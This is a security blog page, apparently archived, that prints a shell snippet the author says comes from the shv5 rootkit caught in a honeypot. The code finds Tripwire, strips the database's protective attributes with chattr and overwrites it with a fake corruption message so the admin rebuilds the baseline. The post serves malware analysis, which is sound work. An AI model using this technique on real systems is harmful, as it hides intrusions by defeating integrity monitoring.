echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}" uname=`uname -n` twd=/var/lib/tripwire/$uname.twd if [ -d /etc/tripwire ]; then echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}" if [ -f /var/lib/tripwire/$uname.twd ]; then chattr -isa $twd echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}" echo "${RED} ALERT! tripwire database found ${RES}" echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}" echo "-----------------------------------------" > $twd echo "Tripwire segment-faulted !" >> $twd echo "-----------------------------------------" >> $twd echo "" >> $twd echo "The reasons for this may be: " >> $twd echo "" >> $twd echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd echo "corrupted files while checking for possible change etc." >> $twd echo "" echo "pls. rerun tripwire to build the database again!" >> $twd echo "" >> $twd else echo "${WHI} lucky you: Tripwire database not found. ${RES}" fi else echo "${WHI} guess not. ${RES}" fi
This Blog has Moved!
This blog is moving to
Thank you for visiting! Content will remain here for archival purposes.
Showing posts with label Tripwire. Show all posts
Showing posts with label Tripwire. Show all posts
Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats
Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention. This code is from the shv5 rootkit, which was released in 2010, and is detected by most antivirus scanners.
Subscribe to:
Posts (Atom)